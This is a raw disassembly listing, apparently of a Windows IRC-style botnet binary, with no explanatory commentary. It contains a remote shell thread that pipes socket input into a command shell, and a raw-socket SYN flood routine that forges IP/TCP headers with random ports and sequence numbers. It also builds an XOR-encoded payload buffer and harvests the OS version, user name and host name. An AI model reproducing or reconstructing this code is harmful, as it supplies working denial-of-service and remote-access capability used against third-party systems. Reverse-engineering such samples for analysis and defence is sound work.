mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_4135A3: ; CODE XREF: sub_41354F+44�j
; sub_41354F+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_413589
loc_4135B3: ; CODE XREF: sub_41354F+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_4916AC ; send
test eax, eax
jle short loc_4135E0
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_413578
; ---------------------------------------------------------------------------
loc_4135E0: ; CODE XREF: sub_41354F+2D�j
; sub_41354F+79�j
mov esi, ds:dword_495328
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_4135FC
call esi ; RtlGetLastWin32Error
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_4012B2
pop ecx
pop ecx
loc_4135FC: ; CODE XREF: sub_41354F+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41354F endp
; ---------------------------------------------------------------------------
db 2Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41362D proc near ; DATA XREF: .text:004131D5�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_413646: ; CODE XREF: sub_41362D+39�j
; sub_41362D+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call dword_491674 ; recv
test eax, eax
jle loc_41374B
cmp [ebp+var_10], ebx
jbe short loc_413668
dec [ebp+var_10]
jmp short loc_413646
; ---------------------------------------------------------------------------
loc_413668: ; CODE XREF: sub_41362D+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_41372B
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_4136D8
cmp al, 7Fh
jz short loc_4136D8
cmp al, 3
jnz short loc_413693
push ebx
push ebx
call ds:dword_495418 ; GenerateConsoleCtrlEvent
jmp short loc_4136FF
; ---------------------------------------------------------------------------
loc_413693: ; CODE XREF: sub_41362D+5A�j
cmp al, 15h
jnz short loc_4136B5
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_4136EB
; ---------------------------------------------------------------------------
loc_4136B5: ; CODE XREF: sub_41362D+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_4136EC
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_4136EB
; ---------------------------------------------------------------------------
loc_4136D8: ; CODE XREF: sub_41362D+52�j
; sub_41362D+56�j
cmp esi, ebx
jbe short loc_413702
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_4136EB: ; CODE XREF: sub_41362D+86�j
; sub_41362D+A9�j
pop ecx
loc_4136EC: ; CODE XREF: sub_41362D+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call dword_4916AC ; send
test eax, eax
jle short loc_41374B
loc_4136FF: ; CODE XREF: sub_41362D+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_413702: ; CODE XREF: sub_41362D+AD�j
cmp al, 0Dh
jnz loc_413646
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_49535C ; WriteFile
test eax, eax
jz short loc_41374B
xor esi, esi
jmp loc_413646
; ---------------------------------------------------------------------------
loc_41372B: ; CODE XREF: sub_41362D+47�j
cmp [ebp+var_C], ebx
jnz short loc_41373C
mov [ebp+var_C], 1
jmp loc_413646
; ---------------------------------------------------------------------------
loc_41373C: ; CODE XREF: sub_41362D+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_413646
; ---------------------------------------------------------------------------
loc_41374B: ; CODE XREF: sub_41362D+2B�j
; sub_41362D+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41362D endp
; ---------------------------------------------------------------------------
db 48h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_413798 proc near ; CODE XREF: sub_4010BE�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4158E0
push [esp+8+arg_4]
mov esi, eax
call sub_4158E0
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_413798 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137C0 proc near ; CODE XREF: sub_401177�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4010BE
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_4137DD
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4137DD: ; CODE XREF: sub_4137C0+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_4158E0
push [ebp+arg_C]
mov esi, eax
call sub_4158E0
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_435448, eax
lea eax, [edi+1]
mov dword_435469, eax
lea eax, [edi+17h]
mov dword_435461, eax
pop eax
push 74h
sub eax, edi
push offset dword_4353E4
push ebx
mov dword_435477, eax
call sub_415960
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_415960
add esi, 74h
push 5
push offset aGet_0 ; " get "
lea eax, [esi+ebx]
push eax
call sub_415960
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_415960
add esi, edi
push 10h
push 43545Dh
lea eax, [esi+ebx]
push eax
call sub_415960
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_415960
add esi, edi
push 38h
add esi, ebx
push offset byte_43546D
push esi
call sub_415960
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_4137C0 endp
; ---------------------------------------------------------------------------
db 36h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4138CE proc near ; CODE XREF: sub_40132A�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4010BE
push eax
call sub_401186
add esp, 0Ch
retn
sub_4138CE endp
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; ---------------------------------------------------------------------------
loc_4138EA: ; CODE XREF: .text:00401168�j
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+10h]
push edi
mov edi, [ebp+14h]
push edi
push ebx
call sub_40132A
cmp eax, [ebp+0Ch]
pop ecx
pop ecx
ja short loc_41390A
cmp eax, 0FFFFh
jbe short loc_41390E
loc_41390A: ; CODE XREF: .text:00413901�j
xor eax, eax
jmp short loc_413953
; ---------------------------------------------------------------------------
loc_41390E: ; CODE XREF: .text:00413908�j
push esi
push edi
push ebx
call sub_4010BE
add eax, 101h
push eax
call sub_415CF8
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_4010BE
pop ecx
pop ecx
push eax
push esi
call sub_401177
push eax
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_401235
push esi
mov edi, eax
call sub_415D6C
add esp, 24h
mov eax, edi
pop esi
loc_413953: ; CODE XREF: .text:0041390C�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
db 1Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_413972 proc near ; CODE XREF: sub_401186�j
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_41397B
inc ecx
loc_41397B: ; CODE XREF: sub_413972+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_413972 endp
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413993 proc near ; CODE XREF: sub_401235�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_4139AF
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_4139AF
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_4139AF
cmp byte ptr [ebp+arg_C], 0
jnz short loc_4139B2
loc_4139AF: ; CODE XREF: sub_413993+8�j
; sub_413993+E�j ...
inc [ebp+arg_C]
loc_4139B2: ; CODE XREF: sub_413993+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_4139DA
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_4139D3
cmp al, 0Dh
jz short loc_4139D3
cmp al, 5Ch
jz short loc_4139D3
test al, al
jnz short loc_4139DA
loc_4139D3: ; CODE XREF: sub_413993+32�j
; sub_413993+36�j ...
add [ebp+arg_C], 100h
loc_4139DA: ; CODE XREF: sub_413993+28�j
; sub_413993+3E�j
push [ebp+arg_C]
call sub_401186
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_4139F2
cmp eax, 0FFFFh
jbe short loc_4139F9
loc_4139F2: ; CODE XREF: sub_413993+56�j
xor eax, eax
jmp loc_413A97
; ---------------------------------------------------------------------------
loc_4139F9: ; CODE XREF: sub_413993+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_49277C
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_413A29
loc_413A0D: ; CODE XREF: sub_413993+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_413A20
cmp al, 0Ah
jz short loc_413A20
cmp al, 0Dh
jz short loc_413A20
cmp al, 5Ch
jnz short loc_413A24
loc_413A20: ; CODE XREF: sub_413993+7F�j
; sub_413993+83�j ...
inc bl
xor edx, edx
loc_413A24: ; CODE XREF: sub_413993+8B�j
inc edx
cmp edx, ecx
jb short loc_413A0D
loc_413A29: ; CODE XREF: sub_413993+78�j
cmp ecx, esi
mov byte_49277C, bl
ja short loc_413A55
push 15h
push offset dword_4353CC
push [ebp+arg_0]
mov byte_4353D9, cl
mov byte_4353DD, bl
call sub_415960
add esp, 0Ch
push 15h
jmp short loc_413A76
; ---------------------------------------------------------------------------
loc_413A55: ; CODE XREF: sub_413993+9E�j
push 17h
push offset dword_4353B4
push [ebp+arg_0]
mov word_4353C2, cx
mov byte_4353C7, bl
call sub_415960
add esp, 0Ch
push 17h
loc_413A76: ; CODE XREF: sub_413993+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_413A92
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_413A84: ; CODE XREF: sub_413993+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_413A84
loc_413A92: ; CODE XREF: sub_413993+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_413A97: ; CODE XREF: sub_413993+61�j
pop esi
leave
retn
sub_413993 endp
; ---------------------------------------------------------------------------
db 41h dup(0CCh)
; ---------------------------------------------------------------------------
loc_413ADB: ; CODE XREF: sub_4012E9�j
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+8]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp-214h]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp-110h]
push eax
lea eax, [ebp-190h]
push eax
lea eax, [ebp-210h]
push eax
call sub_401339
push eax
lea eax, [ebp-414h]
push offset dword_4354D8
push eax
call sub_416821
xor esi, esi
add esp, 18h
cmp [ebp-8], esi
jnz short loc_413B58
push esi
lea eax, [ebp-414h]
push dword ptr [ebp-0Ch]
push eax
lea eax, [ebp-90h]
push eax
push dword ptr [ebp-214h]
call sub_4010D2
add esp, 14h
loc_413B58: ; CODE XREF: .text:00413B36�j
lea eax, [ebp-414h]
push eax
call sub_401014
push dword ptr [ebp-10h]
call sub_4012A3
pop ecx
pop ecx
push esi
call ds:dword_495334 ; ExitThread
pop edi
pop esi
; ---------------------------------------------------------------------------
db 27h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B9E proc near ; CODE XREF: sub_401064�j
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4915D4 ; WSAStartup
test eax, eax
jz short loc_413BDE
xor eax, eax
jmp loc_413E4C
; ---------------------------------------------------------------------------
loc_413BDE: ; CODE XREF: sub_413B9E+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_491700 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_413E44
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_49163C ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_413E3A
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_415CA0
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call dword_49165C ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_49165C ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_49165C ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_49165C ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_495420 ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_49541C ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_417E10
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_413CC9: ; CODE XREF: sub_413B9E+25D�j
; sub_413B9E+26B�j
mov [ebp+var_24], bx
call sub_416B18
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_49165C ; htons
mov [ebp+var_34], ax
call sub_416B18
mov edi, eax
shl edi, 10h
call sub_416B18
or edi, eax
push edi
call dword_49165C ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_491658 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_49165C ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415960
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_415960
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40120D
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415960
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_415960
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_415CA0
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40120D
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415960
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_4916C0 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413E0E
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_49541C ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_413E37
jl loc_413CC9
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_413E37
jmp loc_413CC9
; ---------------------------------------------------------------------------
loc_413E0E: ; CODE XREF: sub_413B9E+247�j
call dword_4915F0 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_435514
push eax
call sub_416821
lea eax, [ebp+var_F4]
push eax
call sub_401014
add esp, 10h
jmp short loc_413E3A
; ---------------------------------------------------------------------------
loc_413E37: ; CODE XREF: sub_413B9E+25B�j
; sub_413B9E+269�j
mov ebx, [ebp+arg_8]
loc_413E3A: ; CODE XREF: sub_413B9E+78�j
; sub_413B9E+297�j
push [ebp+var_C]
call dword_4916F4 ; closesocket
pop esi
loc_413E44: ; CODE XREF: sub_413B9E+5B�j
call dword_4915BC ; WSACleanup
mov eax, ebx
loc_413E4C: ; CODE XREF: sub_413B9E+3B�j
pop edi
pop ebx
leave
retn
sub_413B9E endp
; ---------------------------------------------------------------------------
db 0ACh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_413EFC proc near ; CODE XREF: sub_401339�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4011C2
push [esp+10h+arg_4]
mov esi, eax
call sub_416CCF
push [esp+14h+arg_8]
mov ebx, eax
call sub_416CCF
mov edi, eax
call sub_416B18
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_401064
add esp, 1Ch
test eax, eax
jnz short loc_413F47
push 1
pop eax
loc_413F47: ; CODE XREF: sub_413EFC+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_413EFC endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_413F6C proc near ; CODE XREF: sub_4011AE�j
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_495340 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_492788
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_4163D7
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_413F6C endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; ---------------------------------------------------------------------------
loc_413FEF: ; CODE XREF: .text:0040112C�j
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp-94h]
push esi
push eax
xor esi, esi
mov dword ptr [ebp-94h], 94h
call ds:dword_495404 ; GetVersionExA
test eax, eax
jz short loc_414082
cmp dword ptr [ebp-90h], 4
jnz short loc_414058
cmp [ebp-8Ch], esi
jnz short loc_414040
cmp dword ptr [ebp-84h], 1
jnz short loc_414033
push 1
pop esi
loc_414033: ; CODE XREF: .text:0041402E�j
cmp dword ptr [ebp-84h], 2
jnz short loc_414082
push 1
jmp short loc_414081
; ---------------------------------------------------------------------------
loc_414040: ; CODE XREF: .text:00414025�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_41404D
loc_414049: ; CODE XREF: .text:00414067�j
push 2
jmp short loc_414081
; ---------------------------------------------------------------------------
loc_41404D: ; CODE XREF: .text:00414047�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_414082
jmp short loc_414072
; ---------------------------------------------------------------------------
loc_414058: ; CODE XREF: .text:0041401D�j
cmp dword ptr [ebp-90h], 5
jnz short loc_414082
cmp [ebp-8Ch], esi
jz short loc_414049
cmp dword ptr [ebp-8Ch], 1
jnz short loc_414076
loc_414072: ; CODE XREF: .text:00414056�j
push 3
jmp short loc_414081
; ---------------------------------------------------------------------------
loc_414076: ; CODE XREF: .text:00414070�j
cmp dword ptr [ebp-8Ch], 2
jnz short loc_414082
push 7
loc_414081: ; CODE XREF: .text:0041403E�j
; .text:0041404B�j ...
pop esi
loc_414082: ; CODE XREF: .text:00414014�j
; .text:0041403A�j ...
mov eax, esi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4140AD proc near ; CODE XREF: sub_401041�j
push ebx
push esi
push edi
mov esi, 0F4240h
loc_4140B5: ; CODE XREF: sub_4140AD+2F�j
; sub_4140AD+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call ds:dword_495324 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_417070
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_4140B5
jb short loc_4140E4
cmp ebx, esi
ja short loc_4140B5
loc_4140E4: ; CODE XREF: sub_4140AD+31�j
push 0
push 64h
push edi
push ebx
call sub_4170E0
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_414157
jb short loc_414103
cmp esi, 50h
jnb short loc_414108
loc_414103: ; CODE XREF: sub_4140AD+4F�j
push 4Bh
xor edx, edx
pop eax
loc_414108: ; CODE XREF: sub_4140AD+54�j
test ecx, ecx
ja short loc_414157
jb short loc_414113
cmp esi, 47h
jnb short loc_414118
loc_414113: ; CODE XREF: sub_4140AD+5F�j
push 42h
xor edx, edx
pop eax
loc_414118: ; CODE XREF: sub_4140AD+64�j
test ecx, ecx
ja short loc_414157
jb short loc_414123
cmp esi, 37h
jnb short loc_414128
loc_414123: ; CODE XREF: sub_4140AD+6F�j
push 32h
xor edx, edx
pop eax
loc_414128: ; CODE XREF: sub_4140AD+74�j
test ecx, ecx
ja short loc_414157
jb short loc_414133
cmp esi, 26h
jnb short loc_414138
loc_414133: ; CODE XREF: sub_4140AD+7F�j
push 21h
xor edx, edx
pop eax
loc_414138: ; CODE XREF: sub_4140AD+84�j
test ecx, ecx
ja short loc_414157
jb short loc_414143
cmp esi, 1Eh
jnb short loc_414148
loc_414143: ; CODE XREF: sub_4140AD+8F�j
push 19h
xor edx, edx
pop eax
loc_414148: ; CODE XREF: sub_4140AD+94�j
test ecx, ecx
ja short loc_414157
jb short loc_414153
cmp esi, 0Ah
jnb short loc_414157
loc_414153: ; CODE XREF: sub_4140AD+9F�j
xor eax, eax
xor edx, edx
loc_414157: ; CODE XREF: sub_4140AD+4D�j
; sub_4140AD+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_4140AD endp
; ---------------------------------------------------------------------------
db 2Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414190 proc near ; CODE XREF: sub_40125D�j
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_4370BC
mov [ebp+var_CC], 94h
call ds:dword_495404 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_414217
cmp [ebp+var_C4], ebx
jnz short loc_4141F3
cmp [ebp+var_BC], 1
jnz short loc_4141DD
mov [ebp+var_4], offset a95 ; "95"
loc_4141DD: ; CODE XREF: sub_414190+44�j
cmp [ebp+var_BC], 2
jnz loc_414292
mov [ebp+var_4], offset aNt ; "NT"
jmp short loc_414263
; ---------------------------------------------------------------------------
loc_4141F3: ; CODE XREF: sub_414190+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_414205
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_41425A
; ---------------------------------------------------------------------------
loc_414205: ; CODE XREF: sub_414190+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_414253
mov [ebp+var_4], offset aMe_0 ; "ME"
jmp short loc_41425A
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_414190+33�j
cmp [ebp+var_C8], 5
jnz short loc_414253
cmp [ebp+var_C4], ebx
jnz short loc_414231
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_41425A
; ---------------------------------------------------------------------------
loc_414231: ; CODE XREF: sub_414190+96�j
cmp [ebp+var_C4], 1
jnz short loc_414243
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_41425A
; ---------------------------------------------------------------------------
loc_414243: ; CODE XREF: sub_414190+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_41425A
loc_414253: ; CODE XREF: sub_414190+7C�j
; sub_414190+8E�j
mov [ebp+var_4], offset a??? ; "???"
loc_41425A: ; CODE XREF: sub_414190+73�j
; sub_414190+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_414292
loc_414263: ; CODE XREF: sub_414190+61�j
cmp [ebp+var_B8], bl
jz short loc_414292
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset aSS_5 ; "%s (%s)"
push eax
call sub_416821
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_414292: ; CODE XREF: sub_414190+54�j
; sub_414190+D1�j ...
mov ax, word_42BB44
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_491548
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_4142CB
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_4142CB: ; CODE XREF: sub_414190+12C�j
push [ebp+arg_4]
call sub_401299
pop ecx
push eax
call dword_49169C ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_491614 ; gethostbyaddr
cmp eax, ebx
jz short loc_4142F4
push dword ptr [eax]
jmp short loc_4142F9
; ---------------------------------------------------------------------------
loc_4142F4: ; CODE XREF: sub_414190+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_4142F9: ; CODE XREF: sub_414190+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_416821
pop ecx
lea eax, [ebp+var_4E8]
